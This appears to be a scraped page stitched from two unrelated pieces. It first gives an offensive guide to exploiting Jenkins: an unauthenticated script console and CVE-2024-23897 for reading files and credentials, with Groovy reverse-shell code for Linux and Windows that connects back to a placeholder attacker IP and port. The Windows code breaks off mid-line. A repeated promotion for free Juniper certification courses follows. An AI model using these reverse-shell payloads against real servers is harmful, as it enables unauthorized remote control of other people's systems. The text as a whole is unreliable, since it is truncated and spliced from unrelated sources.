Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Juniper Networks offering free course and certifications.Earn up to FIVE Juniper Networks Associate Certifications for FREE through Juniper Open Learning.
Create account in Junos Genius to access the learning resources and complete the learning path and assessment to earn free voucher.
Offer page : https://learningportal.juniper.net/juniper/user_activity_info.aspx?id=11478
Create account in Junos Genius to access the learning resources and complete the learning path and assessment to earn free voucher.
Offer page : https://learningportal.juniper.net/juniper/user_activity_info.aspx?id=11478
Link to create Junos Genius Account : https://cloud.contentraven.com/junosgenius/signup/register
Make use of it and Happy learning.